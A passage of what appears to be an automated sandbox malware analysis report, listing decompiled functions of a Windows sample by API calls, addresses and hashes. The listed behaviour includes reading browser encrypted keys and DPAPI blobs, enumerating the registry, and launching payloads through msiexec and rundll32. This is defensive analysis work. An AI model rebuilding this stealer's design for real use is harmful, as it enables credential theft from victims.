                                                  • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 02F0CFD8
                                                    • Part of subcall function 02F0CA87: lstrcat.KERNEL32(?,00420B46), ref: 02F0CBAA
                                                    • Part of subcall function 02F0CA87: lstrcat.KERNEL32(?,00420B47), ref: 02F0CBBE
                                                    • Part of subcall function 02F0CA87: lstrcat.KERNEL32(?,00420B4E), ref: 02F0CBDF
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0D0AB
                                                  • CloseHandle.KERNEL32(00000000), ref: 02F0D103
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                  • String ID:
                                                  • API String ID: 3555725114-3916222277
                                                  • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                  • Instruction ID: 77dc4dca41049571a1b364a22dbb799b8606446473336053c435f617f0bedcb5
                                                  • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                  • Instruction Fuzzy Hash: 24E1FE76901208EFCB15EBA4DD94FEEB77AAF14740F804159F206A7190EF346A89CF60
                                                  Function 0040C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02D48F48,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                  • StrStrA.SHLWAPI(?,02D48F60,00420B52), ref: 0040CAF7
                                                  • StrStrA.SHLWAPI(00000000,02D490C8), ref: 0040CB1E
                                                  • StrStrA.SHLWAPI(?,02D49BF0,00000000,?,00421458,00000000,?,00000000,00000000,?,02D45BC0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                  • StrStrA.SHLWAPI(00000000,02D49CF0), ref: 0040CCB9
                                                    • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                    • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02D45CF0), ref: 0040C871
                                                    • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                    • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                  • StrStrA.SHLWAPI(?,02D49CF0,00000000,?,0042145C,00000000,?,00000000,02D45CF0), ref: 0040CD5A
                                                  • StrStrA.SHLWAPI(00000000,02D45970), ref: 0040CD71
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                  • String ID:
                                                  • API String ID: 3555725114-3916222277
                                                  • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                  • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                  • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                  • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                  Function 00418320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • RegOpenKeyExA.ADVAPI32(00000000,02D47090,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                  • wsprintfA.USER32 ref: 00418459
                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                  • String ID: - $%s\%s$?
                                                  • API String ID: 3246050789-3278919252
                                                  • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                  • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                  • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                  • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                  Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • memset.MSVCRT ref: 00410C1C
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                  • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                  • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                  • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                  • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                  • memset.MSVCRT ref: 00410CCD
                                                  • memset.MSVCRT ref: 00410CE1
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID: .exe
                                                  • API String ID: 1395395982-4119554291
                                                  • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                  • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                  • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                  • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                  Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateGlobalStream
                                                  • String ID: image/jpeg
                                                  • API String ID: 2244384528-3785015651
                                                  • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                  • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                  • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                  • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                  Function 004112D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00411307
                                                  • strtok_s.MSVCRT ref: 00411750
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s$lstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 348468850-0
                                                  • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                  • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                  • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                  • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                  Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell$lstrcpy
                                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                  • API String ID: 2507796910-3625054190
                                                  • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                  • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                  • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                  • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                  Function 02F144E7 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 02F14505
                                                  • memset.MSVCRT ref: 02F1451C
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F14553
                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 02F14572
                                                  • lstrcat.KERNEL32(?,?), ref: 02F14586
                                                  • lstrcat.KERNEL32(?,0064A5D8), ref: 02F1459A
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F18FF7: GetFileAttributesA.KERNEL32(00000000,?,02F01DBB,?,?,0042565C,?,?,00420E1F), ref: 02F19006
                                                    • Part of subcall function 02F09F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 02F09FA0
                                                    • Part of subcall function 02F09F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 02F09FF9
                                                    • Part of subcall function 02F09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02F09C53
                                                    • Part of subcall function 02F09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02F09C78
                                                    • Part of subcall function 02F09C27: LocalAlloc.KERNEL32(00000040,?), ref: 02F09C98
                                                    • Part of subcall function 02F09C27: ReadFile.KERNEL32(000000FF,?,00000000,02F016F6,00000000), ref: 02F09CC1
                                                    • Part of subcall function 02F09C27: LocalFree.KERNEL32(02F016F6), ref: 02F09CF7
                                                    • Part of subcall function 02F09C27: CloseHandle.KERNEL32(000000FF), ref: 02F09D01
                                                    • Part of subcall function 02F19627: GlobalAlloc.KERNEL32(00000000,02F14644,02F14644), ref: 02F1963A
                                                  • StrStrA.SHLWAPI(?,0064A0D8), ref: 02F1465A
                                                  • GlobalFree.KERNEL32(?), ref: 02F14779
                                                    • Part of subcall function 02F09D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02F05155,00000000,00000000), ref: 02F09D56
                                                    • Part of subcall function 02F09D27: LocalAlloc.KERNEL32(00000040,?,?,?,02F05155,00000000,?), ref: 02F09D68
                                                    • Part of subcall function 02F09D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02F05155,00000000,00000000), ref: 02F09D91
                                                    • Part of subcall function 02F09D27: LocalFree.KERNEL32(?,?,?,?,02F05155,00000000,?), ref: 02F09DA6
                                                    • Part of subcall function 02F0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02F0A094
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1470A
                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 02F14727
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 02F14739
                                                  • lstrcat.KERNEL32(00000000,?), ref: 02F1474C
                                                  • lstrcat.KERNEL32(00000000,00420FB8), ref: 02F1475B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                  • String ID:
                                                  • API String ID: 1191620704-0
                                                  • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                  • Instruction ID: 5d0a33678c09ae6833c9e8d2c281e51c4dc02cad11aab85eb9af1ced7a479603
                                                  • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                  • Instruction Fuzzy Hash: EF7164B6A00218BBDB14FBE0DC89FEE737AAF88740F408598E60596180EB75D745CF51
                                                  Function 00414280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0041429E
                                                  • memset.MSVCRT ref: 004142B5
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                  • lstrcatA.KERNEL32(?,02D495F0), ref: 0041430B
                                                  • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                  • lstrcatA.KERNEL32(?,02D48FF0), ref: 00414333
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                    • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                    • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                  • StrStrA.SHLWAPI(?,02D495C0), ref: 004143F3
                                                  • GlobalFree.KERNEL32(?), ref: 00414512
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                  • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                  • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                  • String ID:
                                                  • API String ID: 1191620704-0
                                                  • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                  • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                  • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                  • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                  Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00401327
                                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                    • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                  • memset.MSVCRT ref: 00401516
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
